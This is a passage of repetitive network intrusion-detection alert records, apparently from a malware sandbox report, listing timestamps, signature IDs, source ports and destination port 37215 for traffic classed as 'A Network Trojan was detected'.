          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269977
          SID:2829579
          Source Port:41024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.127799
          SID:2829579
          Source Port:51054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226562
          SID:2835222
          Source Port:46994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990423
          SID:2829579
          Source Port:50522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031848
          SID:2829579
          Source Port:51298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073638
          SID:2829579
          Source Port:57498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415756
          SID:2835222
          Source Port:49274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.015040
          SID:2829579
          Source Port:37066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415156
          SID:2835222
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250651
          SID:2835222
          Source Port:43922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919136
          SID:2829579
          Source Port:42848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034038
          SID:2829579
          Source Port:53378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080762
          SID:2835222
          Source Port:53538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998596
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987883
          SID:2829579
          Source Port:37234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865164
          SID:2835222
          Source Port:40058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716609
          SID:2835222
          Source Port:44894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035036
          SID:2829579
          Source Port:58162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077359
          SID:2835222
          Source Port:58660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471015
          SID:2835222
          Source Port:41044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988943
          SID:2829579
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895801
          SID:2829579
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418131
          SID:2829579
          Source Port:52702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945337
          SID:2829579
          Source Port:47518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.122685
          SID:2835222
          Source Port:43536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991347
          SID:2829579
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929276
          SID:2835222
          Source Port:47140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818765
          SID:2829579
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000527
          SID:2835222
          Source Port:46058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414164
          SID:2829579
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921071
          SID:2829579
          Source Port:49558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477439
          SID:2835222
          Source Port:58328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951622
          SID:2835222
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225356
          SID:2835222
          Source Port:36978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990038
          SID:2829579
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245034
          SID:2835222
          Source Port:35216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033748
          SID:2829579
          Source Port:40340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399049
          SID:2835222
          Source Port:50590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287525
          SID:2835222
          Source Port:34486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715731
          SID:2829579
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469389
          SID:2829579
          Source Port:41882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037078
          SID:2835222
          Source Port:57744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008625
          SID:2835222
          Source Port:44548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651395
          SID:2835222
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289012
          SID:2829579
          Source Port:59888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988601
          SID:2835222
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395817
          SID:2835222
          Source Port:58908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948797
          SID:2835222
          Source Port:33420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821595
          SID:2829579
          Source Port:36166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562271
          SID:2835222
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301115
          SID:2829579
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820046
          SID:2829579
          Source Port:46536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466688
          SID:2829579
          Source Port:59050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028827
          SID:2835222
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951498
          SID:2829579
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035930
          SID:2835222
          Source Port:51348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128945
          SID:2829579
          Source Port:40484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034056
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275535
          SID:2835222
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682036
          SID:2829579
          Source Port:34330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.723442
          SID:2829579
          Source Port:55484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224348
          SID:2835222
          Source Port:55998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643602
          SID:2835222
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166379
          SID:2829579
          Source Port:58374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398597
          SID:2835222
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225403
          SID:2829579
          Source Port:46622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552310
          SID:2829579
          Source Port:37574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034107
          SID:2835222
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818694
          SID:2829579
          Source Port:45440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038301
          SID:2835222
          Source Port:58656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226482
          SID:2829579
          Source Port:55390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642735
          SID:2829579
          Source Port:52074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929515
          SID:2835222
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475789
          SID:2829579
          Source Port:34886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033108
          SID:2835222
          Source Port:53448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272853
          SID:2829579
          Source Port:38230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227353
          SID:2829579
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890618
          SID:2829579
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036843
          SID:2829579
          Source Port:59292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645743
          SID:2835222
          Source Port:58060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284804
          SID:2835222
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102304
          SID:2835222
          Source Port:34256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224525
          SID:2829579
          Source Port:36516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993493
          SID:2829579
          Source Port:47790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653117
          SID:2835222
          Source Port:38996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644228
          SID:2829579
          Source Port:36054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928048
          SID:2835222
          Source Port:41546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990817
          SID:2835222
          Source Port:35212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948101
          SID:2829579
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719141
          SID:2835222
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120930
          SID:2835222
          Source Port:35948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268312
          SID:2829579
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074536
          SID:2835222
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419297
          SID:2835222
          Source Port:54040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925255
          SID:2829579
          Source Port:56900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299329
          SID:2829579
          Source Port:51410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225902
          SID:2835222
          Source Port:38172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167352
          SID:2835222
          Source Port:60060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399116
          SID:2829579
          Source Port:37574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026987
          SID:2835222
          Source Port:57122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165374
          SID:2835222
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399135
          SID:2835222
          Source Port:47304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985299
          SID:2829579
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823303
          SID:2829579
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222740
          SID:2829579
          Source Port:33554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645795
          SID:2829579
          Source Port:32936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905834
          SID:2835222
          Source Port:53638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037645
          SID:2829579
          Source Port:44100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926003
          SID:2829579
          Source Port:52844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283507
          SID:2835222
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413695
          SID:2829579
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861295
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928501
          SID:2835222
          Source Port:55272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287424
          SID:2835222
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081639
          SID:2835222
          Source Port:48584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169738
          SID:2829579
          Source Port:54324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568060
          SID:2829579
          Source Port:43518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223113
          SID:2829579
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558337
          SID:2835222
          Source Port:45838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693891
          SID:2829579
          Source Port:44692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230778
          SID:2835222
          Source Port:51940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929607
          SID:2829579
          Source Port:38206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283813
          SID:2829579
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564237
          SID:2829579
          Source Port:52296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038928
          SID:2835222
          Source Port:55146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160337
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.697652
          SID:2835222
          Source Port:51216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163350
          SID:2835222
          Source Port:52834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120536
          SID:2835222
          Source Port:55338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288646
          SID:2829579
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822488
          SID:2835222
          Source Port:34026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003563
          SID:2829579
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719457
          SID:2829579
          Source Port:60818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301245
          SID:2835222
          Source Port:60044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291417
          SID:2835222
          Source Port:41244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286705
          SID:2829579
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082168
          SID:2835222
          Source Port:58252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863335
          SID:2829579
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287131
          SID:2835222
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865202
          SID:2829579
          Source Port:46910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130991
          SID:2829579
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914992
          SID:2829579
          Source Port:47042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396677
          SID:2835222
          Source Port:55950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167379
          SID:2829579
          Source Port:33008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928500
          SID:2835222
          Source Port:41182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475644
          SID:2829579
          Source Port:57750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418365
          SID:2829579
          Source Port:49782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914528
          SID:2835222
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721603
          SID:2829579
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035770
          SID:2835222
          Source Port:44346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223689
          SID:2835222
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471859
          SID:2829579
          Source Port:50684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947416
          SID:2835222
          Source Port:57884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418900
          SID:2829579
          Source Port:58068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861150
          SID:2835222
          Source Port:57300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035944
          SID:2829579
          Source Port:44064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166714
          SID:2835222
          Source Port:56230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415124
          SID:2835222
          Source Port:50482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400120
          SID:2835222
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417643
          SID:2835222
          Source Port:33176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474796
          SID:2829579
          Source Port:46286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163441
          SID:2829579
          Source Port:46764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287931
          SID:2829579
          Source Port:60520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012946
          SID:2835222
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163310
          SID:2835222
          Source Port:52554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162665
          SID:2835222
          Source Port:44168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166028
          SID:2835222
          Source Port:56568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292323
          SID:2829579
          Source Port:49848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691869
          SID:2829579
          Source Port:57504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645767
          SID:2829579
          Source Port:45234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598190
          SID:2835222
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396391
          SID:2829579
          Source Port:59910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720414
          SID:2829579
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820490
          SID:2829579
          Source Port:55020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018105
          SID:2829579
          Source Port:51070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910418
          SID:2829579
          Source Port:40144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276678
          SID:2835222
          Source Port:36296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993493
          SID:2835222
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644465
          SID:2829579
          Source Port:33012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465074
          SID:2829579
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162875
          SID:2829579
          Source Port:32794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922053
          SID:2835222
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926117
          SID:2835222
          Source Port:34614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028062
          SID:2829579
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909469
          SID:2835222
          Source Port:38964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103565
          SID:2835222
          Source Port:43436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412255
          SID:2829579
          Source Port:40634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010593
          SID:2835222
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399359
          SID:2835222
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288884
          SID:2829579
          Source Port:51972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033119
          SID:2829579
          Source Port:54556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920243
          SID:2829579
          Source Port:51248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418352
          SID:2829579
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036726
          SID:2835222
          Source Port:46452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464657
          SID:2829579
          Source Port:38120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074404
          SID:2829579
          Source Port:37428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299199
          SID:2835222
          Source Port:36770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
